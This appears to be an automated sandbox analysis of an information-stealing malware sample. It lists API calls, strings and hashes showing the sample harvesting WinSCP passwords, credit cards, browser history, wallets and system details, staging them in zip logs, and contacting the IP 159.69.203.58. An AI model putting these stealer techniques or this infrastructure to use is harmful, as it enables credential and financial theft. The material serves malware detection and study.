CreateDirectoryA.KERNEL32(00000000,00000000), ref: 004110CF
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00411118
SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0041115D
SetCurrentDirectoryA.KERNEL32(?,004D10CC,00000000,000000FF), ref: 00411228

Part of subcall function 0049D0CC: __wfsopen.LIBCMT ref: 0049D0D9

__time64.LIBCMT ref: 00411259

Part of subcall function 0049D44C: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004959D5,00000000), ref: 0049D457
Part of subcall function 0049D44C: __aulldiv.LIBCMT ref: 0049D477

__localtime64_s.LIBCMT ref: 0041126B
_asctime_s.LIBCMT ref: 00411282
_fprintf.LIBCMT ref: 004112B1
_fprintf.LIBCMT ref: 004112E0
_fprintf.LIBCMT ref: 0041130D
_fprintf.LIBCMT ref: 00411353
_fprintf.LIBCMT ref: 00411399
GetCurrentProcessId.KERNEL32 ref: 004113BA
_fprintf.LIBCMT ref: 004113E0
_fprintf.LIBCMT ref: 004114C2
_fprintf.LIBCMT ref: 00411630
_fprintf.LIBCMT ref: 0041170A
_fprintf.LIBCMT ref: 004117E4

Part of subcall function 00491CE0: _memset.LIBCMT ref: 00491D51
Part of subcall function 00491CE0: GetUserDefaultLocaleName.KERNEL32(?,00000055,0000000F,00000000), ref: 00491D60

_fprintf.LIBCMT ref: 004118BE
_fprintf.LIBCMT ref: 00411998
_fprintf.LIBCMT ref: 00411A72

Part of subcall function 0049CF02: __lock_file.LIBCMT ref: 0049CF49
Part of subcall function 0049CF02: __stbuf.LIBCMT ref: 0049CFCD
Part of subcall function 0049CF02: __output_l.LIBCMT ref: 0049CFDD
Part of subcall function 0049CF02: __ftbuf.LIBCMT ref: 0049CFE7

_fprintf.LIBCMT ref: 00411B4C
_fprintf.LIBCMT ref: 00411C15
_fprintf.LIBCMT ref: 00411C89
_fprintf.LIBCMT ref: 00411D63
_fprintf.LIBCMT ref: 00411E3D
_fprintf.LIBCMT ref: 00411F17
_fprintf.LIBCMT ref: 00411FE0
_fprintf.LIBCMT ref: 0041202F
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041208E
_fprintf.LIBCMT ref: 004120DC
_fprintf.LIBCMT ref: 0041212B
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00412189
_fprintf.LIBCMT ref: 0041141A

Part of subcall function 00491030: GetCurrentProcess.KERNEL32(?,00000000,?,?,004123DF,?,006CC960,00000000,?,006CC910,00000000), ref: 00491042
Part of subcall function 00491030: IsWow64Process.KERNEL32(00000000,?,?,004123DF,?,006CC960,00000000,?,006CC910,00000000), ref: 00491049

Part of subcall function 00490F30: _memset.LIBCMT ref: 00490F6D
Part of subcall function 00490F30: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 00490F8B
Part of subcall function 00490F30: RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 00490FAD
Part of subcall function 00490F30: RegCloseKey.ADVAPI32(?), ref: 00490FB8
Part of subcall function 00490F30: CharToOemA.USER32(?,?), ref: 00490FCB

CreateDirectoryA.KERNEL32(00000000,00000000), ref: 004121CD
SetCurrentDirectoryA.KERNEL32(00000000), ref: 00412210
SetCurrentDirectoryA.KERNEL32(00000000), ref: 0041225C
SetCurrentDirectoryA.KERNEL32(00601058,ccount,00000000,?,00000000,006CC990,00000000,006CCA50,00000000,?,00000000,006CC930,00000000,?,?,006CCA00), ref: 00412652

Part of subcall function 00414AB0: _memset.LIBCMT ref: 00414ABC

Sleep.KERNEL32(00014FF0,2E393531), ref: 00412952

Strings

CPU Count: , xrefs: 00411D29
=, xrefs: 00410E9C
Z, xrefs: 004111E1
\vcruntime140.dll, xrefs: 00410F2A
h0, xrefs: 00412903
L&, xrefs: 0041255F
VideoCard: , xrefs: 00411EDD
[Processes], xrefs: 00411FA0
\mozglue.dll, xrefs: 00410C1F
h#, xrefs: 00412913
Date: %s, xrefs: 004112DA
Path: %s , xrefs: 004113DA
/, xrefs: 00412115
*.*, xrefs: 004127C8
F, xrefs: 004128E6
8@, xrefs: 00410C53
<, xrefs: 004126E2
Processor: , xrefs: 00411C4F
>, xrefs: 00410BBD
\files, xrefs: 00412234, 004127D7
B, xrefs: 00412806
u?, xrefs: 00410D16
\msvcp140.dll, xrefs: 00410CE2
;, xrefs: 004126C7
Local Time: , xrefs: 00411A38
m!, xrefs: 0041293E
TimeZone: , xrefs: 00411B12
[Hardware], xrefs: 00411BD5
;, xrefs: 00410F8B
/softokn3.dll, xrefs: 00410E0B
ccount, xrefs: 004125FB
}F, xrefs: 00410EFE
+>, xrefs: 00410C80
.zip, xrefs: 004126D4
Display Resolution: , xrefs: 004117AA
logs, xrefs: 004128B5
HWID: %s, xrefs: 0041138C
Windows: , xrefs: 00411456
:, xrefs: 004126A9
/msvcp140.dll, xrefs: 00410C85
Y', xrefs: 00412452
159.69.203.58, xrefs: 00410BCE, 00410C91, 00410D54, 00410E17, 00410EDA, 004128E1, 004128F6, 004128FB
HVd, xrefs: 004110AA
\nss3.dll, xrefs: 00410DA5
Work Dir: %s , xrefs: 00411414
Display Language: , xrefs: 00411884
\files\Wallets, xrefs: 00412291
[Software], xrefs: 00412098
files\information.txt, xrefs: 00411248
/nss3.dll, xrefs: 00410D48
\files\, xrefs: 004122B0
?G, xrefs: 00410E3C
X(, xrefs: 00412353
;, xrefs: 00410EC9
\softokn3.dll, xrefs: 00410E68
/mozglue.dll, xrefs: 00410BC2
RAM: , xrefs: 00411E03
MachineID: %s, xrefs: 00411300
h=, xrefs: 00410D43
Computer Name: , xrefs: 004115F6
GUID: %s, xrefs: 00411346
E, xrefs: 0041282E
-=, xrefs: 00410F5E
Version: %s, xrefs: 004112AB
C, xrefs: 00412818
User Name: , xrefs: 004116D0
/vcruntime140.dll, xrefs: 00410ECE
Keyboard Languages: , xrefs: 0041195E
0, xrefs: 004122E1

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$Directory$Create$Current$Process_memset$FileIos_base_dtorTimestd::ios_base::_$CharCloseDefaultLocaleNameOpenQuerySleepSystemUserValueWow64__aulldiv__ftbuf__localtime64_s__lock_file__output_l__stbuf__time64__wfsopen_asctime_s
String ID: [Software]$*.*$.zip$/$/mozglue.dll$/msvcp140.dll$/nss3.dll$/softokn3.dll$/vcruntime140.dll$0$159.69.203.58$:$;$<$B$C$CPU Count: $Computer Name: $Date: %s$Display Language: $Display Resolution: $E$F$GUID: %s$HVd$HWID: %s$Keyboard Languages: $Local Time: $MachineID: %s$Path: %s $Processor: $RAM: $TimeZone: $User Name: $Version: %s$VideoCard: $Windows: $Work Dir: %s $[Hardware]$[Processes]$\files$\files\$\files\Wallets$\mozglue.dll$\msvcp140.dll$\nss3.dll$\softokn3.dll$\vcruntime140.dll$ccount$files\information.txt$logs$ ;$+>$-=$8@$?G$L&$X($Y'$Z$h#$h0$h=$m!$u?$}F$;$=$>
API String ID: 4234026189-847794073
Opcode ID: afcf5bebe2402963074d7130e4d1b672e6bbd167c205d5fc785b8a12446e4f06
Instruction ID: 287dce039ab496ef586ae6d024511396016bdd25e4ef2574f01ac8e6584df064
Opcode Fuzzy Hash: afcf5bebe2402963074d7130e4d1b672e6bbd167c205d5fc785b8a12446e4f06
Instruction Fuzzy Hash: 2DF2A5B18083C0DBD735EB55D885BDF77E9AB95304F00092FE18D56252EBB89184CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 0041C310, Relevance: 70.3, APIs: 25, Strings: 15, Instructions: 324registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041C36A
_memset.LIBCMT ref: 0041C38C
_memset.LIBCMT ref: 0041C3A6
_memset.LIBCMT ref: 0041C3C0
RegOpenKeyExW.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,00000103,77EF155D), ref: 0041C3EB
RegGetValueW.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?,?,?,?,?,?,?,00000103,77EF155D), ref: 0041C419
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000103,77EF155D), ref: 0041C42C
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000103,77EF155D), ref: 0041C43D
RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,00000103,77EF155D), ref: 0041C459
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000103,77EF155D), ref: 0041C47E
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000103,77EF155D), ref: 0041C495
_fprintf.LIBCMT ref: 0041C506
_fprintf.LIBCMT ref: 0041C511
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?), ref: 0041C53B
_fprintf.LIBCMT ref: 0041C54F
RegGetValueA.ADVAPI32 ref: 0041C581
_fprintf.LIBCMT ref: 0041C5AF
_fprintf.LIBCMT ref: 0041C5D8
_fprintf.LIBCMT ref: 0041C5E6
RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?,?,?,?,?), ref: 0041C610
_fprintf.LIBCMT ref: 0041C624

Part of subcall function 0049CF02: __lock_file.LIBCMT ref: 0049CF49
Part of subcall function 0049CF02: __stbuf.LIBCMT ref: 0049CFCD
Part of subcall function 0049CF02: __output_l.LIBCMT ref: 0049CFDD
Part of subcall function 0049CF02: __ftbuf.LIBCMT ref: 0049CFE7

RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,?,?,?,?,?,?,?,?), ref: 0041C666

Part of subcall function 0041BBF0: GetProcessHeap.KERNEL32(00000008,?), ref: 0041BCB2
Part of subcall function 0041BBF0: HeapAlloc.KERNEL32(00000000), ref: 0041BCB5
Part of subcall function 0041BBF0: GetProcessHeap.KERNEL32(00000000,77EF155D), ref: 0041BCCB
Part of subcall function 0041BBF0: HeapFree.KERNEL32(00000000), ref: 0041BCCE

Part of subcall function 00404F50: _memmove.LIBCMT ref: 00404F8B

_fprintf.LIBCMT ref: 0041C6DF
RegEnumKeyExA.ADVAPI32 ref: 0041C70F
RegCloseKey.ADVAPI32(?), ref: 0041C75A

Strings

:22, xrefs: 0041C5D2
Soft: WinSCP, xrefs: 0041C500
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0041C44F
Security, xrefs: 0041C413
:%s, xrefs: 0041C5A9
PortNumber, xrefs: 0041C56B
UserName, xrefs: 0041C602
Password, xrefs: 0041C651
Login: , xrefs: 0041C5E0
Password: %s, xrefs: 0041C6D9
Host: , xrefs: 0041C50B
passwords.txt, xrefs: 0041C4A0
UseMasterPassword, xrefs: 0041C40E
HostName, xrefs: 0041C52D
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0041C3D5

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$Value$CloseHeap_memset$EnumOpenProcess$AllocFree__ftbuf__lock_file__output_l__stbuf_memmove
String ID: Login: $Password: %s$:%s$:22$Host: $HostName$Password$PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 651107544-1600676177
Opcode ID: 2f13f92b3c6a5be3646bf7ac467031b1ee4e832a2dbb5629f53ef20952f3fc58
Instruction ID: 7c8ba2ebac5abec2cffa1197249ddf1b3fbd50a944c5010f4aa48d41b8371064
Opcode Fuzzy Hash: 2f13f92b3c6a5be3646bf7ac467031b1ee4e832a2dbb5629f53ef20952f3fc58
Instruction Fuzzy Hash: D5C19FB1548341AFD720DF51DC81FEBB7E8EBC9704F00492EF18992141E778A9488B6B

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC00, Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 311filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,77EF155D), ref: 0041AC69
lstrcatA.KERNEL32(?,\temp), ref: 0041AC79
CopyFileA.KERNEL32(?,?,00000001), ref: 0041AC87
DeleteFileA.KERNEL32(?), ref: 0041AFC7

Part of subcall function 0049E19E: __fsopen.LIBCMT ref: 0049E1AB

Part of subcall function 0041AA40: _memset.LIBCMT ref: 0041AAE1
Part of subcall function 0041AA40: LocalAlloc.KERNEL32 ref: 0041AB22

_fprintf.LIBCMT ref: 0041ADD7
_fprintf.LIBCMT ref: 0041ADE7
_fprintf.LIBCMT ref: 0041ADF2
_fprintf.LIBCMT ref: 0041ADFE
_fprintf.LIBCMT ref: 0041AE09
_fprintf.LIBCMT ref: 0041AE15
_fprintf.LIBCMT ref: 0041AE20
_fprintf.LIBCMT ref: 0041AE6E
_fprintf.LIBCMT ref: 0041AE98
_fprintf.LIBCMT ref: 0041AEA8

Part of subcall function 0049CF02: __lock_file.LIBCMT ref: 0049CF49
Part of subcall function 0049CF02: __stbuf.LIBCMT ref: 0049CFCD
Part of subcall function 0049CF02: __output_l.LIBCMT ref: 0049CFDD
Part of subcall function 0049CF02: __ftbuf.LIBCMT ref: 0049CFE7

_fprintf.LIBCMT ref: 0041AEB3
_fprintf.LIBCMT ref: 0041AEBF
_fprintf.LIBCMT ref: 0041AECA
_fprintf.LIBCMT ref: 0041AED6
_fprintf.LIBCMT ref: 0041AEE1
_fprintf.LIBCMT ref: 0041AF2F
_fprintf.LIBCMT ref: 0041AF65

Strings

Host: %s, xrefs: 0041ADF8, 0041AEB9
\temp, xrefs: 0041AC6F
Soft: %s, xrefs: 0041ADE1, 0041AEA2
Password: %s, xrefs: 0041AE68, 0041AF29
Login: %s, xrefs: 0041AE0F, 0041AED0

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$File$AllocCopyCurrentDeleteDirectoryLocal__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcat
String ID: Host: %s$Login: %s$Password: %s$Soft: %s$\temp
API String ID: 3148340754-2676079308
Opcode ID: 76136ff908482d74d46b376a15d208096b2e414004d91fdcc01663f17b6b9ee6
Instruction ID: 5855f305d5317dea618cad4f431a335e56faaf9016d61075604566fdf80b3934
Opcode Fuzzy Hash: 76136ff908482d74d46b376a15d208096b2e414004d91fdcc01663f17b6b9ee6
Instruction Fuzzy Hash: 40A124B15043006BCA10EB219C82FEB7BA99F95708F04492EF54597282EB7ED91587BF

Uniqueness

Uniqueness Score: -1.00%

Function 0041B340, Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 177filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041B38D
lstrcatA.KERNEL32(?,\temp), ref: 0041B39D
CopyFileA.KERNEL32(?,?,00000001), ref: 0041B3AB
_memset.LIBCMT ref: 0041B3C0
_sprintf.LIBCMT ref: 0041B3D4
DeleteFileA.KERNEL32(?), ref: 0041B56F

Part of subcall function 0049E19E: __fsopen.LIBCMT ref: 0049E1AB

_fprintf.LIBCMT ref: 0041B481
_fprintf.LIBCMT ref: 0041B48C

Part of subcall function 0049CF02: __lock_file.LIBCMT ref: 0049CF49
Part of subcall function 0049CF02: __stbuf.LIBCMT ref: 0049CFCD
Part of subcall function 0049CF02: __output_l.LIBCMT ref: 0049CFDD
Part of subcall function 0049CF02: __ftbuf.LIBCMT ref: 0049CFE7

_fprintf.LIBCMT ref: 0041B498
_fprintf.LIBCMT ref: 0041B4A3
_fprintf.LIBCMT ref: 0041B4B2
_fprintf.LIBCMT ref: 0041B4BD

Part of subcall function 0041AA40: _memset.LIBCMT ref: 0041AAE1
Part of subcall function 0041AA40: LocalAlloc.KERNEL32 ref: 0041AB22

_fprintf.LIBCMT ref: 0041B50D
_fprintf.LIBCMT ref: 0041B52F

Strings

Month: %s, xrefs: 0041B492
CC\%s_%s.txt, xrefs: 0041B3CE
\temp, xrefs: 0041B393
Name: %s, xrefs: 0041B479
Card: %s, xrefs: 0041B500
Year: %s, xrefs: 0041B4AC

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$File_memset$AllocCopyCurrentDeleteDirectoryLocal__fsopen__ftbuf__lock_file__output_l__stbuf_sprintflstrcat
String ID: CC\%s_%s.txt$Card: %s$Month: %s$Name: %s$Year: %s$\temp
API String ID: 3161493688-3508537252
Opcode ID: d517276bc68615f6bf99cf611a4335747043aa7c5189291e00b97d350334d35b
Instruction ID: 8acee580f3db2ed3fda81b8ff0943596ad47883d145fdde1cecd6ee5fea8284c
Opcode Fuzzy Hash: d517276bc68615f6bf99cf611a4335747043aa7c5189291e00b97d350334d35b
Instruction Fuzzy Hash: AF51A9B150430067C610FB65DCC6FAF77ADABD8708F44492EF54957282EA7CE90487AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041B000, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 265stringfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041B050
lstrcatA.KERNEL32(?,\temp), ref: 0041B069
CopyFileA.KERNEL32(?,?,00000001), ref: 0041B076
_memset.LIBCMT ref: 0041B088
lstrcatA.KERNEL32(?,006CC730), ref: 0041B09B
lstrcatA.KERNEL32(?,004BB7F4), ref: 0041B0A7
lstrcatA.KERNEL32(?,?), ref: 0041B0AF
lstrcatA.KERNEL32(?,004BDFA4), ref: 0041B0BB
lstrcatA.KERNEL32(?,?), ref: 0041B0C3
lstrcatA.KERNEL32(?,.txt), ref: 0041B0CF
DeleteFileA.KERNEL32(?), ref: 0041B315

Part of subcall function 0049E19E: __fsopen.LIBCMT ref: 0049E1AB

lstrcatA.KERNEL32(00000000,006CC740), ref: 0041B1F0
lstrcatA.KERNEL32(00000000,006CC740), ref: 0041B23F
lstrcatA.KERNEL32(00000000,004BDCAC), ref: 0041B252
_fprintf.LIBCMT ref: 0041B2B0
_fprintf.LIBCMT ref: 0041B2D2

Strings

%s%s%s%s%s%s%s, xrefs: 0041B2AA
\temp, xrefs: 0041B05C
.txt, xrefs: 0041B0C5

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset
String ID: %s%s%s%s%s%s%s$.txt$\temp
API String ID: 1987428508-1558371589
Opcode ID: fbf4f0269170031bf65bd40e542091ae8665d03053efbc81da1958aa4f0ceabd
Instruction ID: 45dc01be6d409268b7113cb2dd3585880187eba984a97163c16e246cd204de9e
Opcode Fuzzy Hash: fbf4f0269170031bf65bd40e542091ae8665d03053efbc81da1958aa4f0ceabd
Instruction Fuzzy Hash: FA91E2B1504340ABC320EFA5DC86FABB7A9EFC9704F04095EF58587241E779D948C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 004155C0, Relevance: 31.8, APIs: 5, Strings: 13, Instructions: 304fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,77EF155D,00000008,00000000,00000000), ref: 00415615
GetFileSize.KERNEL32(00000000,00000000), ref: 0041562A
CloseHandle.KERNEL32(?), ref: 0041563E

Strings

image/tiff, xrefs: 00415793
", xrefs: 00415847
tiff, xrefs: 00415781
gif, xrefs: 00415742
image/png, xrefs: 00415776
image/gif, xrefs: 00415758
jpg, xrefs: 0041570E
Content-Type: , xrefs: 00415855
png, xrefs: 00415764
Content-Disposition: form-data; name=", xrefs: 004157E2
., xrefs: 004156EB
"; filename=", xrefs: 0041580B
image/jpeg, xrefs: 00415730

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: "$"; filename="$.$Content-Disposition: form-data; name="$Content-Type: $gif$image/gif$image/jpeg$image/png$image/tiff$jpg$png$tiff
API String ID: 1378416451-4065671631
Opcode ID: ea6a2fb1ee6d6ef402fcf5817fd9f612878bf6c94882d1955451a041e7158876
Instruction ID: 80719e25e603cec28454501bae3b388551409cd9e96ecae93b1df241d7c6c649
Opcode Fuzzy Hash: ea6a2fb1ee6d6ef402fcf5817fd9f612878bf6c94882d1955451a041e7158876
Instruction Fuzzy Hash: B8A103B1208340EFD714EB21D952FEFB7E9ABC8704F104A1EF08697281DA78E944C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00412B50, Relevance: 25.5, APIs: 17, Instructions: 43sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000006F), ref: 00412B59
Sleep.KERNEL32(0000022B), ref: 00412B60
Sleep.KERNEL32(0000014D), ref: 00412B67
Sleep.KERNEL32(0000006F), ref: 00412B6B
Sleep.KERNEL32(0000022B), ref: 00412B72
Sleep.KERNEL32(0000014D), ref: 00412B79

Part of subcall function 004049B0: ExitProcess.KERNEL32 ref: 00404A45

Sleep.KERNEL32(0000022B), ref: 00412B8E
ExitProcess.KERNEL32 ref: 00412B92
Sleep.KERNEL32(0000006F), ref: 00412BA2
Sleep.KERNEL32(0000022B), ref: 00412BA9
Sleep.KERNEL32(0000014D), ref: 00412BB0
Sleep.KERNEL32(0000006F), ref: 00412BB4
Sleep.KERNEL32(0000022B), ref: 00412BBB
Sleep.KERNEL32(0000014D), ref: 00412BC2
Sleep.KERNEL32(0000006F), ref: 00412BC6
Sleep.KERNEL32(0000022B), ref: 00412BCD
Sleep.KERNEL32(0000014D), ref: 00412BD4

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Sleep$ExitProcess
String ID:
API String ID: 3633490160-0
Opcode ID: 142cabb08dc052c3c54d8bb39ea5c523f16a276e84948a7b44703a42e1d2ac0c
Instruction ID: 2b910b3d3d281ebef1baebcb64f510246aba55f29850fa8bf38cf24686bed96f
Opcode Fuzzy Hash: 142cabb08dc052c3c54d8bb39ea5c523f16a276e84948a7b44703a42e1d2ac0c
Instruction Fuzzy Hash: 68F04830E8426971E56277F22C1FB9F1E05AF41BE1F050027721C590E24ED54451CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 004926D0, Relevance: 23.3, APIs: 6, Strings: 7, Instructions: 569processCOMMON

Download Yara Rule

APIs

Part of subcall function 00417A90: std::locale::_Init.LIBCPMT ref: 00417AD6
Part of subcall function 00417A90: std::_Lockit::_Lockit.LIBCPMT ref: 00417AE9

Part of subcall function 00418B00: std::_Lockit::_Lockit.LIBCPMT ref: 00418B59

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004928B5
Process32First.KERNEL32(00000000,00000128), ref: 004928C8
Process32Next.KERNEL32 ref: 004928EE

Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 00417963
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 0041798C
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 004179AB
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 004179CD
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 004179EC
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 00417A09
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 00417A28

Strings

@A@, xrefs: 004927CA, 00492EE1
---------- , xrefs: 00492959, 00492A9F
----------, xrefs: 00492867
0pL, xrefs: 004927C1
@B@, xrefs: 00492826, 00492DD7
A@, xrefs: 004927DE, 00492ECD
`J@, xrefs: 004927F8, 00492D90, 00492DB2

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exception$LockitLockit::_Process32std::_$CreateFirstInitNextSnapshotToolhelp32std::locale::_
String ID: ----------$---------- $0pL$@A@$@B@$`J@$A@
API String ID: 1947876736-662054990
Opcode ID: bc174fdda8882830cc61b04c1a4d856725d22a7d9ca8c9866f43daf0d3f5a8b3
Instruction ID: 2bfb976691c48a61b7a39d47cec03666e9eca9abd99376726084787559db1fd8
Opcode Fuzzy Hash: bc174fdda8882830cc61b04c1a4d856725d22a7d9ca8c9866f43daf0d3f5a8b3
Instruction Fuzzy Hash: 9B329CB1D00258AFDF20DF94CD85BDEBBB4AF45308F1481AEE40967242DBB95A84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00405100, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 195stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00414A10: _memset.LIBCMT ref: 00414A1B
Part of subcall function 00414A10: _strcpy_s.LIBCMT ref: 00414A32
Part of subcall function 00414A10: _memset.LIBCMT ref: 00414A51

_memset.LIBCMT ref: 00405170
_memset.LIBCMT ref: 00405183
_strtok.LIBCMT ref: 004051B3
lstrcatA.KERNEL32(?,00647340,?,?,00000000,77EF155D), ref: 004051DF
lstrcatA.KERNEL32(?,00000000,?,?,00000000,77EF155D), ref: 00405202
lstrcatA.KERNEL32(?,00643EF8), ref: 00405227
lstrcatA.KERNEL32(?,?,?,00000000), ref: 0040525C
lstrcatA.KERNEL32(?,00645508), ref: 0040526C
ShellExecuteA.SHELL32(00000000,00000000,?,004BB6C4,00000000,00000000), ref: 0040533D
_strtok.LIBCMT ref: 00405352

Strings

@sd, xrefs: 004051D0

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$_memset$_strtok$ExecuteShell_strcpy_s
String ID: @sd
API String ID: 1415731133-3239500710
Opcode ID: f9c2aa327a9252ee08233d91339566c0136ba04a51cef3ae75b43697f585151a
Instruction ID: c786249e37913b12d59a80b914a847e06419e2e2d3a03ff72aac9bf4afb915a0
Opcode Fuzzy Hash: f9c2aa327a9252ee08233d91339566c0136ba04a51cef3ae75b43697f585151a
Instruction Fuzzy Hash: 3471A2B11083809FD725EF55C880AABBBECEF95744F40092EF18547151DB789A48CB67

Uniqueness

Uniqueness Score: -1.00%

Function 00416540, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 106filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00416576
lstrcatA.KERNEL32(?,\temp), ref: 00416586
CopyFileA.KERNEL32(?,?,00000001), ref: 00416594
_memset.LIBCMT ref: 004165A9
_sprintf.LIBCMT ref: 004165BD
DeleteFileA.KERNEL32(?), ref: 00416682

Part of subcall function 0049E19E: __fsopen.LIBCMT ref: 0049E1AB

_fprintf.LIBCMT ref: 00416646

Strings

SELECT url FROM urls, xrefs: 004165E8
History\%s_%s.txt, xrefs: 004165B7
\temp, xrefs: 0041657C
%s, xrefs: 00416640

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memset_sprintflstrcat
String ID: %s$History\%s_%s.txt$SELECT url FROM urls$\temp
API String ID: 440339207-2199967400
Opcode ID: 4d2ac0971bee7f0850d0ea8f0a85b41c2c86924b31da9a2c7fb5a7cebf4e5fe6
Instruction ID: f301f8b0ca5b5b5d7556d172ffd4b00453248fe07f68120fbaffefe979a3aa37
Opcode Fuzzy Hash: 4d2ac0971bee7f0850d0ea8f0a85b41c2c86924b31da9a2c7fb5a7cebf4e5fe6
Instruction Fuzzy Hash: FF31ABB25443006BC624EB61EC86FEF73ACAF98704F054D2EF64597141EB78E944C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 004166A0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 110filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004166D6
lstrcatA.KERNEL32(?,\temp), ref: 004166E6
CopyFileA.KERNEL32(?,?,00000001), ref: 004166F4
_memset.LIBCMT ref: 00416709
_sprintf.LIBCMT ref: 0041671D
DeleteFileA.KERNEL32(?), ref: 004167EE

Part of subcall function 0049E19E: __fsopen.LIBCMT ref: 0049E1AB

_fprintf.LIBCMT ref: 004167B2

Strings

Downloads\%s_%s.txt, xrefs: 00416717
\temp, xrefs: 004166DC
%s%s, xrefs: 004167AC

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memset_sprintflstrcat
String ID: %s%s$Downloads\%s_%s.txt$\temp
API String ID: 440339207-2902098628
Opcode ID: 2fc63afe463d02fddce2d21194c23989f69d703fac48a41c92495deb8d0b853a
Instruction ID: 80df4bba3acfbd8c08416efe2c0a09753a5635a6c00385e30a2963ceea5362ea
Opcode Fuzzy Hash: 2fc63afe463d02fddce2d21194c23989f69d703fac48a41c92495deb8d0b853a
Instruction Fuzzy Hash: EA31EBB25043006BC620EB61DC86FEF73ECABD8714F014D2EF65993141EA78E949C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00498570, Relevance: 16.7, APIs: 11, Instructions: 198fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,?,?), ref: 004985A6
GetFileSize.KERNEL32(?,00000000,00000000), ref: 0049862C
